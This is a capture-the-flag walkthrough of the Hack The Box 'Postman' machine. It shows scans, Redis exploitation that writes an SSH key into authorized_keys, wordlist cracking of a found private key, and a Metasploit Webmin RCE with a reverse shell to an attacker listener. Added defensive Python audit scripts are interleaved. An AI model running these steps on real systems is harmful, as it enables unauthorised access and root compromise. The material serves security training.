Basic Scan

Nmap Scan

~/Documents/HTB/Postman root@kali
❯ cat nmap_All.txt
# Nmap 7.80 scan initiated Mon Jan 20 18:28:27 2020 as: nmap -sC -sV -p- -oN nmap_All.txt 10.10.10.160
Nmap scan report for postman (10.10.10.160)
Host is up (0.28s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open ssl/http MiniServ 1.910 (Webmin httpd)
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: MiniServ/1.910
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-trane-info: Problem with XML parsing of /evox/about
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on Postman
| Not valid before: 2019-08-25T16:26:22
|_Not valid after: 2024-08-23T16:26:22
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 20 19:16:04 2020 -- 1 IP address (1 host up) scanned in 2857.11 seconds

The Nmap results show four open ports in total. OpenSSH on port 22 is a fairly recent version with no high-severity vulnerabilities.
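As an added illustration (not part of the original writeup), the following Python script parses the normal-format (-oN) Nmap output above into structured records and attaches triage notes to the two services that the rest of the writeup turns on: a Redis instance reachable from the network, and a Webmin version in the range the exploit module later lists as affected. The sample input is a trimmed, constructed copy of the scan shown above; the version threshold for Webmin is taken from the module's target list quoted later on the page.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample: a trimmed copy of the nmap -oN output shown above.
SAMPLE_NMAP = """\
# Nmap 7.80 scan initiated Mon Jan 20 18:28:27 2020 as: nmap -sC -sV -p- -oN nmap_All.txt 10.10.10.160
Nmap scan report for postman (10.10.10.160)
Host is up (0.28s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis    Redis key-value store 4.0.9
10000/tcp open  ssl/http MiniServ 1.910 (Webmin httpd)
|_http-server-header: MiniServ/1.910
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port-table row: "<port>/<proto>  <state>  <service>  <version text>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_nmap_normal(text: str) -> List[Service]:
    """Extract open ports from nmap's normal (-oN) output; NSE script lines ('|') are skipped."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            services.append(Service(int(m.group(1)), m.group(2), m.group(3),
                                    m.group(4), m.group(5).strip()))
    return services


def triage(services: List[Service]) -> List[Tuple[int, str]]:
    """Attach a follow-up note to services that warrant a closer look."""
    findings = []
    for s in services:
        if s.name == "redis":
            findings.append((s.port, "Redis reachable from the network: confirm requirepass and "
                                     "protected-mode; an unauthenticated instance lets any client "
                                     "change dir/dbfilename and SAVE to an arbitrary path"))
        m = re.search(r"MiniServ (\d+)\.(\d+)", s.version)
        if m and (int(m.group(1)), int(m.group(2))) <= (1, 910):
            findings.append((s.port, f"Webmin {m.group(1)}.{m.group(2)}: within the range the "
                                     "package-updates RCE module lists as affected (<= 1.910); "
                                     "the exploit still needs valid credentials"))
    return findings


if __name__ == "__main__":
    for port, note in triage(parse_nmap_normal(SAMPLE_NMAP)):
        print(f"{port}: {note}")
```

The version comparison treats the Webmin minor number as an integer, which matches Webmin's 1.9xx numbering scheme; the Redis note is the defensive counterpart of the write-up's next section.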

Web Detection

~/Documents/HTB/Postman root@kali
❯ cat gobuster.txt
http://10.10.10.160/index.html (Status: 200) [Size: 3842]
http://10.10.10.160/images (Status: 301) [Size: 313]
http://10.10.10.160/upload (Status: 301) [Size: 313]
http://10.10.10.160/css (Status: 301) [Size: 310]
http://10.10.10.160/js (Status: 301) [Size: 309]
http://10.10.10.160/fonts (Status: 301) [Size: 312]
http://10.10.10.160/server-status (Status: 403) [Size: 300]

~/Documents/HTB/Postman root@kali
❯ cat nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.160
+ Target Hostname: 10.10.10.160
+ Target Port: 80
+ Start Time: 2020-01-20 18:24:40 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: f04, size: 590f549ce0d74, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7865 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2020-01-20 19:13:43 (GMT8) (2943 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The scans against port 80 did not reveal anything interesting either. Port 10000, however, runs Webmin 1.910, which on checking has a known RCE. In practice that exploit requires user credentials, so the likely path is: User -> Find credentials -> RCE -> root

User.txt

Pentesting Redis

According to the scan results the machine also has port 6379 open. Following the method described in [this article], first generate an SSH key.

~/Documents/HTB/Postman root@kali
❯ ssh-keygen -t rsa -f id_rsa
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:rGrn786gHw6q9oO8n/y/L5HzErf6qQuMlCakiC0Z7UI root@kali
The key's randomart image is:
+---[RSA 3072]----+
| |
| . |
|.E. |
|*= . . |
|B.o+ S |
| o+ o * . |
|. ...o+ * . |
| +.oo=o* o. |
|oo=*===X#+ |
+----[SHA256]-----+

Write the SSH key remotely into the target user's home directory.

~/Documents/HTB/Postman root@kali
❯ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

~/Documents/HTB/Postman root@kali
❯ cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
OK

~/Documents/HTB/Postman root@kali
❯ redis-cli -h 10.10.10.160
10.10.10.160:6379> CONFIG GET dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/lib/redis/.ssh/
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379>

Once that is done, log in with the key.

~/Documents/HTB/Postman root@kali
❯ ssh -i id_rsa redis@10.10.10.160
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ whoami
redis
redis@Postman:~$
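From the defender's side, the sequence above (CONFIG SET dir, CONFIG SET dbfilename, SAVE) leaves a recognisable artefact: the "authorized_keys" file is really a Redis RDB dump, and sshd accepts it only because it silently skips every line it cannot parse as a key. The following Python script is an added example (not from the original post) that audits an authorized_keys file for exactly that: the RDB magic at the start, and any non-blank, non-comment line that is not a parseable key. The file contents and the public key inside it are constructed for the example and only mimic the shape of a real dump.

```python
import base64
import re
from typing import List

# Constructed sample public key (not a real key): only its structure matters here.
FAKE_PUBKEY = "ssh-rsa " + base64.b64encode(b"\x00\x00\x00\x07ssh-rsa" + b"\x01" * 24).decode() + " root@kali"

# Constructed sample: roughly what ~/.ssh/authorized_keys looks like after a Redis SAVE
# wrote it. A real RDB file is binary; this mimics its shape: the "REDIS0008" magic and an
# aux field, the stored value (the key padded with blank lines), then the EOF marker and
# checksum bytes.
RDB_POLLUTED = (
    b"REDIS0008\xfa\tredis-ver\x054.0.9\xfe\x00\xfb\x01\x00\x00\x07crackit\x40\x80"
    b"\n\n\n" + FAKE_PUBKEY.encode() + b"\n\n\n"
    b"\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0"
)
# Constructed sample of a normal, administrator-written file.
CLEAN = b"# admin workstation\n" + FAKE_PUBKEY.encode() + b"\n"

# A key line: optional single options word, key type, base64 blob, optional comment.
KEY_LINE = re.compile(
    r"^(?:\S+\s+)?(?:ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+[A-Za-z0-9+/]+=*(?:\s+.*)?$"
)


def audit_authorized_keys(data: bytes) -> List[str]:
    """Return findings for content a normal key-management workflow would never produce."""
    findings = []
    if data.startswith(b"REDIS"):
        findings.append("starts with the Redis RDB magic: written by a Redis SAVE, not by an administrator")
    for lineno, raw in enumerate(data.split(b"\n"), 1):
        line = raw.decode("utf-8", errors="replace").strip()
        if not line or line.startswith("#"):
            continue  # sshd ignores blank lines and comments
        if not KEY_LINE.match(line):
            # sshd also skips lines it cannot parse, which is exactly why the key was wrapped
            # in newlines: the binary RDB framing lands on its own, ignored, lines.
            findings.append(f"line {lineno}: not a parseable key line ({line[:24]!r})")
    return findings


if __name__ == "__main__":
    print(audit_authorized_keys(RDB_POLLUTED))
    print(audit_authorized_keys(CLEAN))
```

The fix on the Redis side is the usual one: bind to localhost (or a private interface), set requirepass, keep protected-mode on, and rename or disable CONFIG so a client cannot repoint dir and dbfilename. On the host side, a service account such as redis has no business logging in over SSH at all, so giving it a nologin shell makes a key dropped into its home directory useless.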

Migrate to a Higher-Privileged User

Listing the home directories reveals a user named Matt; attempting to read user.txt fails with a permission error.

redis@Postman:~$ ls /home/
Matt
redis@Postman:~$ cd /home/Matt
redis@Postman:/home/Matt$ ls
user.txt
redis@Postman:/home/Matt$ cat user.txt
cat: user.txt: Permission denied
redis@Postman:/home/Matt$

While exploring the filesystem, an SSH key turns up in /opt/.

redis@Postman:/opt$ ls
id_rsa.bak

Inspecting it shows an encrypted RSA private key:

redis@Postman:/opt$ cat id_rsa.bak 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
[encrypted key body omitted]
-----END RSA PRIVATE KEY-----
redis@Postman:/opt$

Copy it to the local machine and brute-force the passphrase with john, which yields the password.

~/Documents/HTB/Postman root@kali
❯ python /usr/share/john/ssh2john.py id_rsa_Matt.hash id_rsa_Matt.hash >id_rsa_Matt.john
~/Documents/HTB/Postman root@kali
❯ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_Matt.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa_Matt.hash)
1g 0:00:00:07 42.73% (ETA: 12:54:56) 0.1347g/s 839905p/s 839905c/s 839905C/s liamnoellie..liamnh
1g 0:00:00:18 DONE (2020-01-21 12:54) 0.05555g/s 796761p/s 796761c/s 796761C/sa6_123..*7¡Vamos!
Session completed
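Why does a wordlist attack on this key run at roughly 800,000 candidates per second? The "Proc-Type: 4,ENCRYPTED" / "DEK-Info: DES-EDE3-CBC,..." headers mark the legacy OpenSSL PEM format, whose passphrase-to-key derivation is a single MD5 round (EVP_BytesToKey), whereas the newer "BEGIN OPENSSH PRIVATE KEY" container uses bcrypt with a configurable round count. The following Python script is an added example (not from the original post) that classifies private key files by container and cipher so that an audit can flag unencrypted keys and legacy-PEM keys left lying around, as id_rsa.bak was. The samples are constructed: the first reproduces only the header of id_rsa.bak from the page with a placeholder body, and the OpenSSH-format samples are minimal hand-built blobs containing just the header fields the parser reads.

```python
import base64
import re
import struct
from typing import Dict


def _openssh_body(cipher: bytes, kdf: bytes) -> str:
    """Constructed minimal openssh-key-v1 blob: magic, ciphername, kdfname, empty kdfoptions, nkeys=1.

    The public/private key blobs that follow in a real file are omitted; the parser
    below only reads the header fields.
    """
    raw = b"openssh-key-v1\x00"
    for field in (cipher, kdf, b""):
        raw += struct.pack(">I", len(field)) + field
    raw += struct.pack(">I", 1)
    return base64.b64encode(raw).decode()


# Constructed samples. The first reproduces the header of id_rsa.bak from the page;
# its body is deliberately a placeholder.
SAMPLES = {
    "id_rsa.bak": (
        "-----BEGIN RSA PRIVATE KEY-----\n"
        "Proc-Type: 4,ENCRYPTED\n"
        "DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C\n"
        "\n"
        "(base64 key body omitted in this constructed sample)\n"
        "-----END RSA PRIVATE KEY-----\n"
    ),
    "legacy_plain": "-----BEGIN RSA PRIVATE KEY-----\n(body omitted)\n-----END RSA PRIVATE KEY-----\n",
    "openssh_enc": "-----BEGIN OPENSSH PRIVATE KEY-----\n" + _openssh_body(b"aes256-ctr", b"bcrypt")
                   + "\n-----END OPENSSH PRIVATE KEY-----\n",
    "openssh_plain": "-----BEGIN OPENSSH PRIVATE KEY-----\n" + _openssh_body(b"none", b"none")
                     + "\n-----END OPENSSH PRIVATE KEY-----\n",
}


def classify_private_key(pem: str) -> Dict[str, str]:
    """Report container format, cipher, and how much a passphrase really protects the key."""
    header = re.search(r"-----BEGIN ([A-Z ]+?) PRIVATE KEY-----", pem)
    if not header:
        return {"format": "unknown", "cipher": "?", "assessment": "not a PEM private key"}
    if header.group(1) == "OPENSSH":
        body = "".join(l for l in pem.splitlines() if not l.startswith("-----"))
        raw = base64.b64decode(body)
        magic = b"openssh-key-v1\x00"
        if not raw.startswith(magic):
            return {"format": "openssh", "cipher": "?", "assessment": "bad magic"}
        off, fields = len(magic), []
        for _ in range(2):  # length-prefixed strings: ciphername, then kdfname
            (n,) = struct.unpack(">I", raw[off:off + 4])
            fields.append(raw[off + 4:off + 4 + n].decode())
            off += 4 + n
        cipher, kdf = fields
        if cipher == "none":
            return {"format": "openssh", "cipher": "none",
                    "assessment": "unencrypted: whoever can read the file owns the key"}
        return {"format": "openssh", "cipher": cipher,
                "assessment": f"encrypted with a {kdf} KDF (tunable rounds): expensive to guess"}
    # Legacy OpenSSL PEM: encryption is signalled by the Proc-Type / DEK-Info headers.
    dek = re.search(r"^DEK-Info:\s*([A-Z0-9-]+),", pem, re.M)
    if "Proc-Type: 4,ENCRYPTED" in pem and dek:
        return {"format": "legacy-pem", "cipher": dek.group(1),
                "assessment": "encrypted, but the key is one MD5 round over the passphrase "
                              "(EVP_BytesToKey): cheap to guess with a wordlist"}
    return {"format": "legacy-pem", "cipher": "none",
            "assessment": "unencrypted: whoever can read the file owns the key"}


if __name__ == "__main__":
    for name, pem in SAMPLES.items():
        print(name, classify_private_key(pem))
```

Run over a filesystem, the same function applied to every file matching the BEGIN header gives a quick inventory of keys outside ~/.ssh (backups like id_rsa.bak, keys in /opt or /tmp) and of those whose passphrase buys little; converting them with a current ssh-keygen to the OpenSSH format with a bcrypt KDF is the usual remediation.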

With the password in hand, logging in over SSH with the key failed, but switching users with su succeeded, giving access to user.txt.

redis@Postman:/opt$ su Matt
Password:
Matt@Postman:/opt$ cd
Matt@Postman:~$ cat user.txt
517ad0ec2458ca97af8d93aac08a2f3c
Matt@Postman:~$

Privilege Escalation

On inspection, Webmin is running as root.

Matt@Postman:~$ ps -ef | grep webmin
root 705 1 0 04:28 ? 00:00:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
root 900 705 0 04:59 ? 00:00:00 /usr/share/webmin/package-updates/update.cgi
Matt 947 883 0 05:01 pts/0 00:00:00 grep --color=auto webmin
Matt@Postman:~$

As planned earlier, use the PoC to escalate privileges.

msf5 exploit(linux/http/webmin_packageup_rce) > show options 

Module options (exploit/linux/http/webmin_packageup_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD computer2008 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.160 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 10000 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME Matt yes Webmin Username
VHOST no HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.24 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Webmin <= 1.910


msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 10.10.14.24:4444
[+] Session cookie: 59f3fe7bd37b2b102da760cbe1f1ce8b
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.24:4444 -> 10.10.10.160:41748) at 2020-01-21 12:58:05 +0800

id
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
root@Postman:/usr/share/webmin/package-updates/# cd
cd
root@Postman:~# cat root.txt
cat root.txt
a257741c5bed8be7778c6ed95686ddce
root@Postman:~#